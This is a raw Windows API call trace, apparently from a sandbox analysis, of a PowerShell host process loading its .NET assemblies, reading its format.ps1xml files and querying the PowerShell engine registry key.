	[0224.702] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2de48e0 | out: lpFileInformation=0x2de48e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0224.703] GetLastError () returned 0x0
	[0224.703] SetErrorMode (uMode=0x1) returned 0x1
	[0224.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.703] GetLastError () returned 0x0
	[0224.703] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x334) returned 0x0
	[0224.703] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0224.703] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0224.703] RegCloseKey (hKey=0x334) returned 0x0
	[0224.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.798] GetLastError () returned 0x0
	[0224.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.798] GetLastError () returned 0x0
	[0224.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0224.819] GetLastError () returned 0x0
	[0224.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0224.822] GetLastError () returned 0x57
	[0224.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0224.832] GetLastError () returned 0x57
	[0224.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.836] GetLastError () returned 0x57
	[0224.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0224.838] GetLastError () returned 0x57
	[0224.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0224.840] GetLastError () returned 0x57
	[0224.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0224.841] GetLastError () returned 0x57
	[0224.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0224.843] GetLastError () returned 0x57
	[0224.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0224.954] GetLastError () returned 0x57
	[0224.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0224.956] GetLastError () returned 0x57
	[0224.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0224.957] GetLastError () returned 0x57
	[0224.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0224.958] GetLastError () returned 0x57
	[0224.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0224.959] GetLastError () returned 0x57
	[0224.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0224.960] GetLastError () returned 0x57
	[0224.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0224.961] GetLastError () returned 0x57
	[0224.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0224.962] GetLastError () returned 0x57
	[0224.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0224.962] GetLastError () returned 0x57
	[0224.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0224.963] GetLastError () returned 0x57
	[0224.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.963] GetLastError () returned 0x57
	[0224.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.963] GetLastError () returned 0x57
	[0224.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.963] GetLastError () returned 0x57
	[0224.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.963] GetLastError () returned 0x57
	[0224.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.964] GetLastError () returned 0x57
	[0224.994] VirtualQuery (in: lpAddress=0x10d710, lpBuffer=0x10e710, dwLength=0x1c | out: lpBuffer=0x10e710*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0224.999] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x3ff71afa, Data2=0x48bc, Data3=0x44db, Data4=([0]=0x91, [1]=0x24, [2]=0x63, [3]=0x81, [4]=0x4c, [5]=0xa8, [6]=0xc1, [7]=0x47))) returned 0x0
	[0225.094] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x304d3bd3, Data2=0x3f06, Data3=0x4dd9, Data4=([0]=0xae, [1]=0x73, [2]=0x7a, [3]=0xbb, [4]=0xd4, [5]=0x82, [6]=0x61, [7]=0xd8))) returned 0x0
	[0225.094] VirtualQuery (in: lpAddress=0x10d788, lpBuffer=0x10e788, dwLength=0x1c | out: lpBuffer=0x10e788*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.095] VirtualQuery (in: lpAddress=0x10d788, lpBuffer=0x10e788, dwLength=0x1c | out: lpBuffer=0x10e788*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.095] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x66a7f88f, Data2=0xcf6c, Data3=0x44d4, Data4=([0]=0xa5, [1]=0x0, [2]=0x69, [3]=0x19, [4]=0x69, [5]=0xb5, [6]=0xc5, [7]=0x3d))) returned 0x0
	[0225.102] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x5b2a986, Data2=0x201b, Data3=0x4c6f, Data4=([0]=0xbf, [1]=0x54, [2]=0x8e, [3]=0x5, [4]=0xa0, [5]=0xde, [6]=0x62, [7]=0xd4))) returned 0x0
	[0225.102] VirtualQuery (in: lpAddress=0x10d8b4, lpBuffer=0x10e8b4, dwLength=0x1c | out: lpBuffer=0x10e8b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.102] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.102] VirtualQuery (in: lpAddress=0x10d760, lpBuffer=0x10e760, dwLength=0x1c | out: lpBuffer=0x10e760*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.102] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x4a5216ac, Data2=0xa76d, Data3=0x4881, Data4=([0]=0x8b, [1]=0xc7, [2]=0xaa, [3]=0xf0, [4]=0x44, [5]=0x82, [6]=0x6b, [7]=0xc8))) returned 0x0
	[0225.102] VirtualQuery (in: lpAddress=0x10d8b4, lpBuffer=0x10e8b4, dwLength=0x1c | out: lpBuffer=0x10e8b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.102] VirtualQuery (in: lpAddress=0x10d7cc, lpBuffer=0x10e7cc, dwLength=0x1c | out: lpBuffer=0x10e7cc*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.103] VirtualQuery (in: lpAddress=0x10d480, lpBuffer=0x10e480, dwLength=0x1c | out: lpBuffer=0x10e480*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.103] VirtualQuery (in: lpAddress=0x10d480, lpBuffer=0x10e480, dwLength=0x1c | out: lpBuffer=0x10e480*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.104] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x72c42acc, Data2=0xc451, Data3=0x4d2a, Data4=([0]=0x81, [1]=0x33, [2]=0xee, [3]=0x87, [4]=0x91, [5]=0x64, [6]=0x56, [7]=0x5d))) returned 0x0
	[0225.104] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xd0ce2cd1, Data2=0x486e, Data3=0x4cc6, Data4=([0]=0x92, [1]=0x47, [2]=0x54, [3]=0x99, [4]=0x4a, [5]=0x3d, [6]=0x47, [7]=0xe1))) returned 0x0
	[0225.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.104] GetLastError () returned 0x57
	[0225.104] SetErrorMode (uMode=0x1) returned 0x1
	[0225.104] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c
	[0225.104] GetLastError () returned 0x0
	[0225.104] GetFileType (hFile=0x35c) returned 0x1
	[0225.104] SetErrorMode (uMode=0x1) returned 0x1
	[0225.104] GetFileType (hFile=0x35c) returned 0x1
	[0225.104] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.104] GetLastError () returned 0x0
	[0225.105] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.105] GetLastError () returned 0x0
	[0225.105] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.105] GetLastError () returned 0x0
	[0225.105] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.105] GetLastError () returned 0x0
	[0225.105] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.105] GetLastError () returned 0x0
	[0225.105] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.105] GetLastError () returned 0x0
	[0225.105] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.105] GetLastError () returned 0x0
	[0225.105] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.105] GetLastError () returned 0x0
	[0225.107] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.107] GetLastError () returned 0x0
	[0225.107] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.107] GetLastError () returned 0x0
	[0225.107] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.107] GetLastError () returned 0x0
	[0225.107] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.107] GetLastError () returned 0x0
	[0225.108] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.108] GetLastError () returned 0x0
	[0225.108] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.108] GetLastError () returned 0x0
	[0225.108] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.108] GetLastError () returned 0x0
	[0225.108] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.108] GetLastError () returned 0x0
	[0225.111] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0225.111] GetLastError () returned 0x0
	[0225.111] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0xbce, lpOverlapped=0x0) returned 1
	[0225.111] GetLastError () returned 0x0
	[0225.111] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd0fce, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd0fce*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.111] GetLastError () returned 0x0
	[0225.112] ReadFile (in: hFile=0x35c, lpBuffer=0x2cd1860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2cd1860*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0225.112] GetLastError () returned 0x0
	[0225.112] CloseHandle (hObject=0x35c) returned 1
	[0225.112] GetLastError () returned 0x0
	[0225.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.112] GetLastError () returned 0x0
	[0225.112] SetErrorMode (uMode=0x1) returned 0x1
	[0225.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cf285c | out: lpFileInformation=0x2cf285c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0225.112] GetLastError () returned 0x0
	[0225.112] SetErrorMode (uMode=0x1) returned 0x1
	[0225.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.112] GetLastError () returned 0x0
	[0225.112] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x35c) returned 0x0
	[0225.113] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
